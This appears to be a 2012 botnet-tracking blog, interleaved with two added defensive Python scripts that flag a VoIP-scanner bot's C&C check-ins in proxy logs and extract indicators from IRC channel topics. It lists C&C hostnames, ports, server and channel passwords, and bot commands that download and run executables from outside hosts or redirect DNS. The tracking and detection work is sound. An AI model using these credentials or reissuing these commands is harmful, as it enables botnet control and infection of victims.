Note: New domains are at the bottom of the post.

This is the Skype "worm" that is in the news right now.

Articles:
http://www.techspot.com/news/50443-dorkbot-worm-spreading-via-skype-installs-nasty-ransomware.html
http://news.cnet.com/8301-1009_3-57528353-83/worm-spreading-on-skype-im-installs-ransomware/
http://techcrunch.com/2012/10/08/ransomware-worm-now-spreading-on-skype/
http://www.forbes.com/sites/adriankingsleyhughes/2012/10/08/ransomware-worm-spreading-via-skype/
http://countermeasures.trendmicro.eu/skype-worm-spreading-fast/

Resolved venus.timeinfo.pl to 63.223.107.62, 176.9.192.131, 213.165.71.142, 217.160.108.147, 213.165.71.153, 87.106.98.157, 74.208.112.178
Server: venus.timeinfo.pl
Port: 1863
Password: 24r34t
SSL is needed to connect; accept the invalid certificate.
Authhost: bossman
Read more...
b4buj4ym0d3m.nl.ai (Aryan IRC botnet hosted by Canada Montreal Ovh Hosting Inc).
Resolved b4buj4ym0d3m.nl.ai to 198.27.119.91
Server: b4buj4ym0d3m.nl.ai
Port: 6969
Channel: #Aryan#
Channel password: Aryan
* Topic for #Aryan# is: @Botkill
* Topic for #Aryan# set by God at Mon Oct 08 01:09:13 2012
No weed MOTD for this one.
Hosting info: http://whois.domaintools.com/198.27.119.91
lucasbaby.no-ip.info (IRC botnets hosted by Canada Montreal Ovh Hosting Inc.)
Resolved lucasbaby.no-ip.info to 142.4.203.95
Server: lucasbaby.no-ip.info
Port: 6969
Channel: #karmie#
Channel password: 1234
Nick: [USA|XP|gjetth]
Topic for #karmie# is: @dl 1 hxxp://dl.dropbox.com/u/81040225/raw_out.exe
Topic for #karmie# set by God at Sun Oct 07 13:42:09 2012
Opers:
[Boss] (Anxiety@HaZe.GoV): Anxiety
[Boss] ~#karmie#
[Boss] irc.HaZe.GoV :HaZeNet
[Boss] idle 12:09:34, signon: Mon Oct 08 00:16:30
[Boss] End of WHOIS
Read more...
123.gets-it.net (Ganja ircbot hosted by United States St. Louis Hosting Solutions International Inc)
Resolved 123.gets-it.net to 69.64.62.151
Server: 123.gets-it.net
Port: 6697
* Current Local Users: 34 Max: 40
* Current Global Users: 34 Max: 40
Channel: #Ganja
* Topic for #Ganja is: DO NOT USE THE SPEEDTEST COMMAND!
* Topic for #Ganja set by Anxiety at Sat Oct 06 02:54:30 2012
Opers:
* [Anxiety] (Anxiety@Test-5D47311C.bchsia.telus.net): Anxiety
* [Anxiety]
Read more...
50.7.239.180 (Rage bots hosted by Czech Republic Zlin Fdcservers.net)
Server: 50.7.239.180
Port: 7777
Channel: #rage
* Topic for #rage is: .b0tk1ller 30 .p2p .rarworm .xpl 75 1 75.x.x.x 3 1 76.x.x.x
* Topic for #rage set by cyberthrill at Wed Oct 03 13:55:03 2012
Nick format: L0v3|fQrHrWbarp
Opers:
* [BGChaser] (Ares@sab-5E6EA00F.telnet.bg): Ares
* [BGChaser] @#rinfo @#binfo #rscan @#rage @#bkiller #b
* [BGChaser] 50.7.239.180 :Server
Read more...
casinovegas.mobi (VoIP scanning botnet hosted by United States Missoula Sharktech)
I found this recently and thought it was interesting enough to post. It's an HTTP-controlled botnet used to scan for VoIP servers.

Malware actions:
Tells the C&C server it has installed: 208.98.52.163/90/getip.php?action=live
Requests an IP segment to scan: 208.98.52.163/90/getip.php?action=get
Downloads and installs Python (needed for the scanner): hxxp://208.98.52.163/90/files/python-2.7.2.msi
IP range to be scanned is confirmed: 208.98.52.163/90/insert.php?action=online&computer=USER-PC&range=95.211.169.45-95.211.199.255
Unrar utility is downloaded: hxxp://208.98.52.163/90/files/UnRAR.exe
Scanner is downloaded: hxxp://208.98.52.163/90/files/pack.rar
The malware
Read more...
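The six requests above always arrive in the same order from an infected host, which makes them a usable proxy-log signature. The following is an added example (not code from the original post, and not the botnet's own code) that maps each request onto a stage of that check-in sequence, groups the hits per client and C&C host, and parses the range parameter to size the scan the bot was assigned. The log format, client addresses, timestamps and status codes are constructed assumptions for the example; the paths and parameter names are the ones listed above.

```python
import re
from ipaddress import ip_address
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log ("epoch client method url status"), built from the request
# paths quoted in the post. Client addresses, timestamps and status codes are made up;
# the second client only shows the first stage, to exercise the partial-match path.
SAMPLE_PROXY_LOG = """\
1349700001.123 10.0.0.12 GET http://208.98.52.163/90/getip.php?action=live 200
1349700002.456 10.0.0.12 GET http://208.98.52.163/90/getip.php?action=get 200
1349700003.789 10.0.0.12 GET http://208.98.52.163/90/files/python-2.7.2.msi 200
1349700005.000 10.0.0.12 GET http://208.98.52.163/90/insert.php?action=online&computer=USER-PC&range=95.211.169.45-95.211.199.255 200
1349700006.000 10.0.0.12 GET http://208.98.52.163/90/files/UnRAR.exe 200
1349700007.000 10.0.0.12 GET http://208.98.52.163/90/files/pack.rar 200
1349700010.000 10.0.0.33 GET http://www.example.org/getip.php?action=live 200
1349700011.000 10.0.0.33 GET http://www.example.org/index.html 200
"""

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+)$")


def classify_request(url):
    """Map one request URL onto a stage of the check-in sequence, or None if it matches nothing."""
    parts = urlsplit(url)
    path = parts.path.lower()
    query = parse_qs(parts.query)
    action = query.get("action", [""])[0]
    if path.endswith("/getip.php") and action == "live":
        return "checkin"
    if path.endswith("/getip.php") and action == "get":
        return "range_request"
    if path.endswith("/insert.php") and action == "online" and "range" in query:
        return "range_confirm"
    if "/files/" in path and path.endswith((".msi", ".exe", ".rar")):
        return "tool_download"
    return None


def parse_range(text):
    """Parse "a.b.c.d-e.f.g.h" into (start, end, address_count); None if malformed or reversed."""
    try:
        start_s, end_s = text.split("-", 1)
        start, end = ip_address(start_s), ip_address(end_s)
    except ValueError:
        return None
    if start.version != end.version or int(end) < int(start):
        return None
    return str(start), str(end), int(end) - int(start) + 1


def detect(log_text):
    """Group stage hits per (client, C&C host) and grade them.

    'infected' requires both the check-in and the range confirmation from the same
    client to the same host; a lone stage is only 'suspicious', because a path such as
    getip.php?action=live is generic enough to collide with unrelated sites.
    """
    hits = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        stage = classify_request(m.group("url"))
        if stage is None:
            continue
        host = urlsplit(m.group("url")).hostname
        entry = hits.setdefault((m.group("client"), host), {
            "client": m.group("client"), "c2_host": host, "stages": [],
            "computer": None, "range": None, "range_size": None,
        })
        entry["stages"].append(stage)
        if stage == "range_confirm":
            query = parse_qs(urlsplit(m.group("url")).query)
            entry["computer"] = query.get("computer", [None])[0]
            parsed = parse_range(query["range"][0])
            if parsed:
                entry["range"] = (parsed[0], parsed[1])
                entry["range_size"] = parsed[2]
    for entry in hits.values():
        seen = set(entry["stages"])
        entry["verdict"] = "infected" if {"checkin", "range_confirm"} <= seen else "suspicious"
    return sorted(hits.values(), key=lambda e: (e["client"], e["c2_host"]))


if __name__ == "__main__":
    for alert in detect(SAMPLE_PROXY_LOG):
        print(alert["verdict"], alert["client"], "->", alert["c2_host"], alert["stages"], alert["range_size"])
```

The range parameter is worth parsing rather than just logging: it tells you which external network the infected host is about to scan, so the abuse report can go to the owner of that range as well as to the C&C host's provider.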
crysis4.net (Andromeda HTTP bot hosted by Ukraine Ukrainian Internet Names Center Ltd)
Resolved crysis4.net to 91.231.84.114
Gate url: http://crysis4.net/knockout/image.php
Login url: http://crysis4.net/knockout/index.php
Rootkit plugin: http://crysis4.net/test/r.pack
Hosting info: http://whois.domaintools.com/91.231.84.114
tut0r1allsvu.info (ngr botnet hosted by United States Elk Grove Village Foroquimica Sl)
Resolved tut0r1allsvu.info to 75.127.10.3
Server: tut0r1allsvu.info
Port: 8059
Password: ocx
Channel: ##h4n
Channel password: shell3
* Topic for ##h4n is: -up hxxp://www.premiersportsgroup.co/utily.exe 96E0E5E5861397EF644FA006BB888956 | -s
* Topic for ##h4n set by Ko0l at Tue Oct 02 05:13:49 2012
Redirecting Colombian bots for pharming:
* Topic for #CO is: -mdns http://www.ellegadodelleon.com.ar/wp-content/it.txt
* Topic for #CO set by
Read more...
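The channel topics quoted in this post and in the #karmie# and #rage posts above are the bots' command lines: download-and-execute (@dl), update with an MD5 to verify against (-up ... | -s), DNS redirection (-mdns), and exploit/scan settings (.xpl). When you are sitting on one of these servers with a plain IRC client, the useful output is the URLs and hashes, not the raw topic. Here is an added example, not code from the original blog, that reads raw RPL_TOPIC (numeric 332) lines and pulls out the commands, download URLs, hosts and MD5s. The sample lines are constructed from the topics on this page; the server name irc.example.invalid, the nick "bot", and the command-sigil convention (a token starting with @, ., - or ! begins a new command) are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample of raw IRC server lines (RPL_TOPIC, numeric 332), built from the
# channel topics quoted in the posts. The server name and the nick "bot" are made up;
# the channels, commands, URLs and the MD5 are the ones shown on the page.
SAMPLE_IRC_LINES = [
    ":irc.example.invalid 332 [USA|XP|gjetth] #karmie# :@dl 1 hxxp://dl.dropbox.com/u/81040225/raw_out.exe",
    ":irc.example.invalid 332 L0v3|fQrHrWbarp #rage :.b0tk1ller 30 .p2p .rarworm .xpl 75 1 75.x.x.x 3 1 76.x.x.x",
    ":irc.example.invalid 332 bot ##h4n :-up hxxp://www.premiersportsgroup.co/utily.exe 96E0E5E5861397EF644FA006BB888956 | -s",
    ":irc.example.invalid 332 bot #CO :-mdns http://www.ellegadodelleon.com.ar/wp-content/it.txt",
    ":irc.example.invalid 372 bot :- MOTD text, not a topic",
]

# ":<server> 332 <nick> <channel> :<topic>" -- the topic is the trailing parameter.
TOPIC_RE = re.compile(r"^:(?P<prefix>\S+) 332 (?P<nick>\S+) (?P<chan>\S+) :(?P<topic>.*)$")
# Accept both live and defanged (hxxp) schemes so hosts are still recovered from notes.
URL_RE = re.compile(r"\bh(?:xx|tt)ps?://\S+", re.I)
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b", re.I)
# Assumption: a token starting with one of these begins a command; later tokens are its args.
COMMAND_SIGILS = "@.-!"


def split_commands(topic):
    """Split a bot topic into (verb, args) tuples.

    Commands are separated either by '|' or by the next sigil-prefixed token, which
    covers both "-up URL MD5 | -s" and ".b0tk1ller 30 .p2p .rarworm .xpl ...".
    """
    commands = []
    for segment in topic.split("|"):
        current = None
        for token in segment.split():
            if len(token) > 1 and token[0] in COMMAND_SIGILS:
                current = (token, [])
                commands.append(current)
            elif current is not None:
                current[1].append(token)
    return commands


def refang(url):
    """Turn hxxp:// back into http:// so the URL can be parsed and compared."""
    return re.sub(r"^hxxp", "http", url, flags=re.I)


def extract_topic_iocs(lines):
    """Pull channel, commands, download URLs, hosts and MD5s out of RPL_TOPIC lines."""
    found = []
    for line in lines:
        m = TOPIC_RE.match(line.strip())
        if not m:
            continue
        topic = m.group("topic")
        urls = [refang(u.rstrip(".,;")) for u in URL_RE.findall(topic)]
        found.append({
            "channel": m.group("chan"),
            "commands": split_commands(topic),
            "urls": urls,
            "hosts": [urlparse(u).hostname for u in urls],
            "md5s": [h.lower() for h in MD5_RE.findall(topic)],
        })
    return found


if __name__ == "__main__":
    for ioc in extract_topic_iocs(SAMPLE_IRC_LINES):
        print(ioc["channel"], ioc["commands"], ioc["urls"], ioc["md5s"])
```

The hash next to the -up URL is the one the bots use to verify the update they fetch; keeping it beside the URL lets you confirm that the sample you download later is the same binary the topic was pointing at, and not a replacement the operator pushed in the meantime.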
m74.zapto.org (IRC botnets hosted by United Kingdom Santrex Internet Services)
This has so few bots I normally wouldn't bother posting it, but I just think it's funny that after being posted once, they haven't even added a password.

Resolved m74.zapto.org to 67.43.226.29
Server: m74.zapto.org
Port: 6667
Current Global Users: 237 Max: 246
Channel: ##A## Bot: Athena
Channel: ##I## Bot: Insomnia
Channel: #j0r Bot: ngrBot
Channel:
Read more...
ssl.pxnet.to (Insomnia hosted by Antarctica Voxility S.r.l.)
Resolved ssl.pxnet.to to 109.163.234.180
Server: ssl.pxnet.to
Port: 8888
Current Local Users: 301 Max: 888
Channel: #Frank
Opers:
[Hitler] (Hitler@Tracert1): Hitler
[Hitler] #Frank
[Hitler] flow.streamscene.to :!
[Hitler] is a Network Administrator
[Hitler] is available for help.
[Hitler] idle 00:04:44, signon: Sat Sep 22 10:32:40
[Hitler] End of WHOIS list.
[Fl00der] (Fl00der@gehaxelt-4FBCF4E0.gigabit.perfect-privacy.com): …
[Fl00der] #Frank
[Fl00der]
Read more...